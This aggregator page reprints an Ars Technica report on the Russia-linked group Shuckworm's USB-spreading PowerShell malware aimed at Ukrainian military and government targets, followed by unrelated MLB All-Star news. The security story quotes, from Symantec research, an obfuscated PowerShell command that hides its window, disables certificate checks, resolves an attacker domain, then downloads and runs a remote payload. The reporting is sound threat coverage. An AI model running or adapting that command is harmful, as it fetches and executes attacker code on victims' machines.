Connect with us

Published

on

LASER-FOCUSED — Russia-backed hackers unleash new USB-based malware on Ukraines military Shuckworm’s relentless attacks seek intel for use in Russia’s invasion of Ukraine.

Dan Goodin – Jun 15, 2023 10:30 am UTC EnlargeGetty Images reader comments 9 with

Hackers working for Russias Federal Security Service have mounted multiple cyberattacks that used USB-based malware to steal large amounts of data from Ukrainian targets for use in its ongoing invasion of its smaller neighbor, researchers said.

The sectors and nature of the organizations and machines targeted may have given the attackers access to significant amounts of sensitive information, researchers from Symantec, now owned by Broadcom, wrote in a Thursday post. There were indications in some organizations that the attackers were on the machines of the organizations human resources departments, indicating that information about individuals working at the various organizations was a priority for the attackers, among other things.

The group, which Symantec tracks as Shuckworm and other researchers call Gamaredon and Armageddon, has been active since 2014 and has been linked to Russias FSB, the principal security service in that country. The group focuses solely on obtaining intelligence on Ukrainian targets. In 2020, researchers at security firm SentinelOne said the hacking group had attacked over 5,000 individual entities across the Ukraine, with particular focus on areas where Ukrainian troops are deployed.

In February, Shuckworm began deploying new malware and command-and-control infrastructure that has successfully penetrated the defenses of multiple Ukrainian organizations in the military, security services, and government of that country. Group members seem most interested in obtaining information related to sensitive military information that could be abused in Russias ongoing invasion.

This newer campaign debuted new malware in the form of a PowerShell script that spreads Pterodo, a Shuckworm-created backdoor. The script activates when infected USB drives are connected to targeted computers. The malicious script first copies itself onto the targeted machine to create a shortcut file with the extension rtf.lnk. The files have names such as video_porn.rtf.lnk, do_not_delete.rtf.lnk, and evidence.rtf.lnk. The names, which are mostly in the Ukrainian language, are an attempt to entice targets to open the files so they will install Pterodo on machines. Advertisement

The script goes on to enumerate all drives connected to the targeted computer and to copy itself to all attached removable drives, most likely in hopes of infecting any air-gapped devices, which are intentionally not connected to the Internet in an attempt to prevent them from being hacked.

To cover its tracks, Shuckworm has created dozens of variants and rapidly rotated the IP addresses and infrastructure it uses for command and control. The group also uses legitimate services such as Telegram and its micro-blogging platform Telegraph for command and control in another attempt to avoid detection.

Shuckworm typically uses phishing emails as an initial vector into targets computers. The emails contain malicious attachments that masquerade as files with extensions, including .docx, .rar, .sfx, lnk, and hta. Emails often use topics such as armed conflicts, criminal proceedings, combating crime, and protecting children as lures to get targets to open the emails and click on the attachments.

Symantec researchers said that an infected computer they recovered in the campaign was typical for the way it works. They wrote: In one victim, the first sign of malicious activity was when the user appeared to open a RAR archive file that was likely delivered via a spear-phishing email and which contained a malicious Document.

After the document was opened, a malicious PowerShell command was observed being executed to download the next-stage payload from the attackers C&C server:

“CSIDL_SYSTEMcmd.exe” /c start /min “” powershell -w hidden
“$gt=’/get.’+[char](56+56)+[char](104)+[char](112);$hosta=[char](50+4
8);[system.net.servicepointmanager]::servercertificatevalidationcallb
ack={$true};$hosta+=’.vafikgo.’;$hosta+=[char](57+57);$hosta+=[char](
60+57);$addrs=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.ad
dresslist[0];$client=(new-object
net.webclient);$faddr=’htt’+’ps://’+$addr+$gt;$text=$client.downloads
tring($faddr);iex $text”

More recently, Symantec has observed Shuckworm leveraging more IP addresses in their PowerShell scripts. This is likely an attempt to evade some tracking methods employed by researchers.

Shuckworm also continues to update the obfuscation techniques used in its PowerShell scripts in an attempt to avoid detection, with up to 25 new variants of the groups scripts observed per month between January and April 2023.

Thursdays post includes IP addresses, hashes, file names, and other indicators of compromise people can use to detect if they have been targeted. The post also warns that the group poses a threat that targets should take seriously.

This activity demonstrates that Shuckworms relentless focus on Ukraine continues, they wrote. It seems clear that Russian nation-state-backed attack groups continue to laser in on Ukrainian targets in attempts to find data that may potentially help their military operations. reader comments 9 with Dan Goodin Dan Goodin is Senior Security Editor at Ars Technica, where he oversees coverage of malware, computer espionage, botnets, hardware hacking, encryption, and passwords. In his spare time, he enjoys gardening, cooking, and following the independent music scene. Advertisement Channel Ars Technica ← Previous story Next story → Related Stories Today on Ars

Continue Reading

Sports

It’s MLB Home Run Derby Day! Predictions, live updates and takeaways

Published

on

By

It's MLB Home Run Derby Day! Predictions, live updates and takeaways

It’s 2025 MLB All-Star Home Run Derby day in Atlanta!

Some of the most dynamic home run hitters in baseball will be taking aim at the Truist Park stands on Monday (8 p.m. ET on ESPN) in one of the most anticipated events of the summer.

While the prospect of a back-to-back champion is out of the picture — 2024 winner Teoscar Hernandez is not a part of this year’s field — a number of exciting stars will be taking the field, including Atlanta’s own Matt Olson, who replaced Ronald Acuna Jr. just three days before the event. Will Olson make a run in front of his home crowd? Will Cal Raleigh show off the power that led to 38 home runs in the first half? Or will one of the younger participants take the title?

We have your one-stop shop for everything Derby related, from predictions to live updates once we get underway to analysis and takeaways at the night’s end.


MLB Home Run Derby field

Cal Raleigh, Seattle Mariners (38 home runs in 2025)
James Wood, Washington Nationals (24)
Junior Caminero, Tampa Bay Rays (23)
Byron Buxton, Minnesota Twins (21)
Brent Rooker, Athletics (20)
Matt Olson, Atlanta Braves (17)
Jazz Chisholm Jr., New York Yankees (17)
Oneil Cruz, Pittsburgh Pirates (16)


Live updates


Who is going to win the Derby and who will be the runner-up?

Jeff Passan: Raleigh. His swing is perfect for the Derby: He leads MLB this season in both pull percentage and fly ball percentage, so it’s not as if he needs to recalibrate it to succeed. He has also become a prolific hitter from the right side this season — 16 home runs in 102 at-bats — and his ability to switch between right- and left-handed pitching offers a potential advantage. No switch-hitter (or catcher for that matter) has won a Home Run Derby. The Big Dumper is primed to be the first, beating Buxton in the finals.

Alden Gonzalez: Cruz. He might be wildly inconsistent at this point in his career, but he is perfect for the Derby — young enough to possess the stamina required for a taxing event that could become exhausting in the Atlanta heat; left-handed, in a ballpark where the ball carries out better to right field; and, most importantly, capable of hitting balls at incomprehensible velocities. Raleigh will put on a good show from both sides of the plate but will come in second.

Buster Olney: Olson. He is effectively pinch-hitting for Acuna, and because he received word in the past 72 hours of his participation, he hasn’t had the practice rounds that the other competitors have been going through. But he’s the only person in this group who has done the Derby before, which means he has experienced the accelerated pace, adrenaline and push of the crowd.

His pitcher, Eddie Perez, knows something about performing in a full stadium in Atlanta. And, as Olson acknowledged in a conversation Sunday, the park generally favors left-handed hitters because of the larger distances that right-handed hitters must cover in left field.

Jesse Rogers: Olson. Home-field advantage will mean something this year as hitting in 90-plus degree heat and humidity will be an extra challenge in Atlanta. Olson understands that and can pace himself accordingly. Plus, he was a late addition. He has got nothing to lose. He’ll outlast the young bucks in the field. And I’m not putting Raleigh any lower than second — his first half screams that he’ll be in the finals against Olson.

Jorge Castillo: Wood. His mammoth power isn’t disputed — he can jack baseballs to all fields. But the slight defect in his power package is that he doesn’t hit the ball in the air nearly as often as a typical slugger. Wood ranks 126th out of 155 qualified hitters across the majors in fly ball percentage. And he still has swatted 24 home runs this season. So, in an event where he’s going to do everything he can to lift baseballs, hitting fly balls won’t be an issue, and Wood is going to show off that gigantic power en route to a victory over Cruz in the finals.


Who will hit the longest home run of the night — and how far?

Passan: Cruz hits the ball harder than anyone in baseball history. He’s the choice here, at 493 feet.

Gonzalez: If you exclude the Coors Field version, there have been just six Statcast-era Derby home runs that have traveled 497-plus feet. They were compiled by two men: Aaron Judge and Giancarlo Stanton. James Wood — all 6-foot-7, 234 pounds of him — will become the third.

Olney: James Wood has the easy Stanton- and Judge-type power, and he will clear the Chophouse with the longest homer. Let’s say 497 feet.

Rogers: Hopefully he doesn’t injure himself doing it, but Buxton will break out his massive strength and crush a ball at least 505 feet. I don’t see him advancing far in the event, but for one swing, he’ll own the night.

Castillo: Cruz hits baseballs hard and far. He’ll crush a few bombs, and one will reach an even 500 feet.


Who is the one slugger fans will know much better after the Derby?

Passan: Buxton capped his first half with a cycle on Saturday, and he’ll carry that into the Derby, where he will remind the world why he was baseball’s No. 1 prospect in 2015. Buxton’s talent has never been in question, just his health. And with his body feeling right, he has the opportunity to put on a show fans won’t soon forget.

Olney: Caminero isn’t a big name and wasn’t a high-end prospect like Wood was earlier in his career. Just 3½ years ago, Caminero was dealt to the Rays by the Cleveland Guardians in a relatively minor November trade for pitcher Tobias Myers. But since then, he has refined his ability to cover inside pitches and is blossoming this year into a player with ridiculous power. He won’t win the Derby, but he’ll open some eyes.


What’s the one moment we’ll all be talking about long after this Derby ends?

Gonzalez: The incredible distances and velocities that will be reached, particularly by Wood, Cruz, Caminero, Raleigh and Buxton. The hot, humid weather at Truist Park will only aid the mind-blowing power that will be on display Monday night.

Rogers: The exhaustion on the hitter’s faces, swinging for home run after home run in the heat and humidity of Hot-lanta!

Castillo: Cruz’s 500-foot blast and a bunch of other lasers he hits in the first two rounds before running out of gas in the finals.

Continue Reading

Sports

Report: Sternberg to sell Rays for $1.7 billion

Published

on

By

Report: Sternberg to sell Rays for .7 billion

Tampa Bay Rays owner Stu Sternberg has agreed in principle to a $1.7 billion deal to sell the franchise to a group led by a Florida-based developer Patrick Zalupski, according to a report from The Athletic.

The deal is reportedly expected to be closed as early as September and will keep the franchise in the area, with Zalupski, a homebuilder in Jacksonville, having a strong preference to land in Tampa rather than St. Petersburg.

Sternberg bought the Rays in 2004 for $200 million.

According to Zalupski’s online bio, he is the founder, president and CEO of Dream Finders Homes. The company was founded in December 2008 and closed on 27 homes in Jacksonville the following year. Now, with an expanded footprint to many parts of the United States, Dream Finders has closed on more than 31,100 homes since its founding.

He also is a member of the board of trustees at the University of Florida.

The new ownership group also reportedly includes Bill Cosgrove, the CEO of Union Home Mortgage, and Ken Babby, owner of the Akron RubberDucks and Jacksonville Jumbo Shrimp, both minor-league teams.

A year ago, Sternberg had a deal in place to build a new stadium in the Historic Gas Plant District, a reimagined recreational, retail and residential district in St. Petersburg to replace Tropicana Field.

However, after Hurricane Milton shredded the roof of the stadium last October, forcing the Rays into temporary quarters, Sternberg changed his tune, saying the team would have to bear excess costs that were not in the budget.

“After careful deliberation, we have concluded we cannot move forward with the new ballpark and development project at this moment,” Sternberg said in a statement in March. “A series of events beginning in October that no one could have anticipated led to this difficult decision.”

MLB commissioner Rob Manfred and some other owners began in March to privately push Sternberg to sell the franchise, The Athletic reported.

It is unclear what Zalupski’s group, if it ultimately goes through with the purchase and is approved by MLB owners, will do for a permanent stadium.

The Rays are playing at George M. Steinbrenner Field in Tampa, located at the site of the New York Yankees‘ spring training facility and home of their Single-A Tampa Tarpons.

Field Level Media contributed to this report.

Continue Reading

Sports

Ohtani hits leadoff for NL; Raleigh cleanup for AL

Published

on

By

Ohtani hits leadoff for NL; Raleigh cleanup for AL

ATLANTA — Shohei Ohtani will bat leadoff as the designated hitter for the National League in Tuesday night’s All-Star Game at Truist Park, and the Los Angeles Dodgers star will be followed in the batting order by left fielder Ronald Acuna Jr. of the host Atlanta Braves.

Arizona second baseman Ketel Marte will hit third in the batting order announced Monday by Dodgers manager Dave Roberts, followed by Los Angeles first baseman Freddie Freeman, San Diego Padres third baseman Manny Machado, Dodgers catcher Will Smith, Chicago Cubs right fielder Kyle Tucker, New York Mets shortstop Francisco Lindor and Cubs center fielder Pete Crow-Armstrong.

Pittsburgh Pirates right-hander Paul Skenes will start his second straight All-Star Game, Major League Baseball announced last week. Detroit Tigers left-hander Tarik Skubal will make his first All-Star start for the American League.

“I think when you’re talking about the game, where it’s at, these two guys … are guys that you can root for, are super talented, are going to be faces of this game for years to come,” Roberts said.

Detroit second baseman Gleyber Torres will lead off for the AL, followed by Tigers left fielder Riley Greene, New York Yankees right fielder Aaron Judge, Seattle Mariners catcher Cal Raleigh, Toronto Blue Jays first baseman Vladimir Guerrero Jr., Baltimore Orioles designated hitter Ryan O’Hearn, Tampa Bay Rays third baseman Junior Caminero, Tigers center fielder Javy Báez and Athletics shortstop Jacob Wilson.

Ohtani led off for the AL in the 2021 All-Star Game, when the two-way sensation also was the AL’s starting pitcher. He hit leadoff in 2022, then was the No. 2 hitter for the AL in 2023 and for the NL last year after leaving the Los Angeles Angels for the Dodgers.

Skenes and Skubal are Nos. 1-2 in average four-seam fastball velocity among those with 1,500 or more pitches this season, Skenes at 98.2 mph and Skubal at 97.6 mph, according to MLB Statcast.

A 23-year-old right-hander, Skenes is 4-8 despite a major league-best 2.01 ERA for the Pirates, who are last in the NL Central. The 2024 NL Rookie of the Year has 131 strikeouts and 30 walks in 131 innings.

Skubal, a 28-year-old left-hander, is the reigning AL Cy Young Award winner. He is 10-3 with a 2.23 ERA, striking out 153 and walking 16 in 121 innings.

Continue Reading

Trending